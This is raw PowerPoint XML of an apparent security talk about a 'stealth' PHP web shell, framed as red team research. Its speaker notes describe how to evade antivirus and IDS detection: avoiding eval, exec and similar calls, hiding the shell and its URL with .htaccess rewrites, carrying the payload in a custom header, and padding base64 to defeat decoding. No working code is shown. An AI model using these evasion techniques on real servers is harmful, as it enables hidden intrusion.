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0" r:id="rId4"/>
    <p:sldId id="298" r:id="rId5"/>
    <p:sldId id="279" r:id="rId6"/>
    <p:sldId id="281" r:id="rId7"/>
    <p:sldId id="282" r:id="rId8"/>
    <p:sldId id="283" r:id="rId9"/>
    <p:sldId id="285" r:id="rId10"/>
    <p:sldId id="284" r:id="rId11"/>
    <p:sldId id="286" r:id="rId12"/>
    <p:sldId id="302" r:id="rId13"/>
    <p:sldId id="287" r:id="rId14"/>
    <p:sldId id="288" r:id="rId15"/>
    <p:sldId id="289" r:id="rId16"/>
    <p:sldId id="291" r:id="rId17"/>
    <p:sldId id="292" r:id="rId18"/>
    <p:sldId id="290" r:id="rId19"/>
    <p:sldId id="300" r:id="rId20"/>
    <p:sldId id="293" r:id="rId21"/>
    <p:sldId id="301" r:id="rId22"/>
    <p:sldId id="297" r:id="rId23"/>
    <p:sldId id="303" r:id="rId24"/>
    <p:sldId id="299" r:id="rId25"/>
    <p:sldId id="295" r:id="rId26"/>
    <p:sldId id="296" r:id="rId27"/>
    <p:sldId id="27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34"/>
    <a:srgbClr val="ADCB57"/>
    <a:srgbClr val="6E1873"/>
    <a:srgbClr val="B83288"/>
    <a:srgbClr val="FFD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73920" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="57" d="100"/>
          <a:sy n="57" d="100"/>
        </p:scale>
        <p:origin x="-1716" y="-96"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide orient="horz" pos="792"/>
        <p:guide orient="horz" pos="182"/>
        <p:guide orient="horz" pos="1013"/>
        <p:guide orient="horz" pos="3864"/>
        <p:guide orient="horz" pos="3794"/>
        <p:guide orient="horz" pos="4171"/>
        <p:guide pos="2880"/>
        <p:guide pos="150"/>
        <p:guide pos="5550"/>
        <p:guide pos="294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908A0B1-C5F5-4D97-9FCC-F231C41DF8CD}" type="datetimeFigureOut">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>03/05/2013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1F8235E-C010-4539-9B94-C12F39BEB4C3}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3085568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While I mostly wrote the stealth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> shell to prove a theory I had, there are legitimate use cases for stealth attacks. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Red team exercises for example.</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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="259717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Aim is to prevent discovery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> by users of the system by appearing in a file list.</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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27081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order to keep the payload out of the url we'll provide it outside of the request URI and request body. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>A cookie is a common place to store the payload, but I decided to use a non cookie header. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Just to be safe, in case someone decides to log cookies.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
            </a:b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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1881577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Use base64, but pad it to break</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> automatic decoding attempts.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Caveat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>: regex based matching will still match the string behind AA. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Use a leading space at the start of your command to generate unmatched base64 strings</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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198716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Luckily the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> file also offers us an option to hide the url of our web shell using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>mod_rewrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>This allows us to invoke the shell through a different url.</a:t>
            </a:r>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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102750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are the goals I set in order for the shell to be “stealth”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282868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shell should not contain any bad function calls such as eval, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>passthru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>, exec, system, `` or similar operators. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>This is to avoid detection from scanners such as anti virus or static analysis tools.</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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233709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Aim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>is to prevent discovery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> by users of the system by appearing in a file list.</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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27081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order to keep the payload out of the url we'll provide it outside of the request URI and request body. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>A cookie is a common place to store the payload, but I decided to use a non cookie header. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Just to be safe, in case someone decides to log cookies.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
            </a:b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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102750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By applying common encoding we can ensure that plaintext rules don't match our payload and make parsing the request expensive enough to ensure that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>realtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> decoding isn't feasible. </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>For the extra paranoid, encoding in combination with basic obfuscation will stop detection by IDS which can offload the offline decoding to an agent. I chose plain base64_encoding, and padded it with some bytes to make automated parsing fail.</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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1987164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Luckily the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> file also offers us an option to hide the url of our web shell using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>mod_rewrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>This allows us to invoke the shell through a different url.</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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188157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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282868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shell should not contain any bad function calls such as eval, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>passthru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>, exec, system, `` or similar operators. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>This is to avoid detection from scanners such as anti virus or static analysis tools.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{91F8235E-C010-4539-9B94-C12F39BEB4C3}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2337098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S x 6">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 19" descr="BLACK DETICA LOGOTYP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6538" y="287338"/>
            <a:ext cx="103028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BAE_S_TITLE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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="136525" y="6469063"/>
            <a:ext cx="3890809" cy="348813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stratsec.net Pty Ltd trading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BAE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Systems </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Detica </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(2012). All rights reserved.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BAE SYSTEMS and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DETICA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>are trade marks of BAE Systems plc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="236661" y="1600224"/>
            <a:ext cx="8573963" cy="460800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pP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1281286"/>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accent3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0" defTabSz="180975">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>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GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Picture Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5295120"/>
            <a:ext cx="2987824" cy="832892"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-GB" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Picture Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149255" y="5295120"/>
            <a:ext cx="3003134" cy="832892"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-GB" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Picture Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3074627" y="5295120"/>
            <a:ext cx="2987824" cy="832892"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-GB" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Picture Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4380720"/>
            <a:ext cx="2987824" cy="832892"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-GB" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Picture Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149255" y="4380720"/>
            <a:ext cx="3003134" cy="832892"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-GB" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Picture Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3074627" y="4380720"/>
            <a:ext cx="2987824" cy="832892"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-GB" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="20"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="131601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U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FontTx/>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7DCFB80C-C9D0-4D51-A71A-D0D81139AD29}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306014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ORANG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FontTx/>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015FBB1D-31BF-420C-82AF-72D7656EBA77}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39916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GREEN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FontTx/>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0E3FCAF2-6FF2-419F-AF4F-B9BC1001355C}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="926046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PURPL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E1873"/>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FontTx/>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02C6628D-EB4A-4D39-83E0-FD955395BFF3}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="120854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GREY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FontTx/>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65AA03B7-5536-41B5-99C7-F52B2F17EF66}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="252146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BLUE FULL BLEED">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
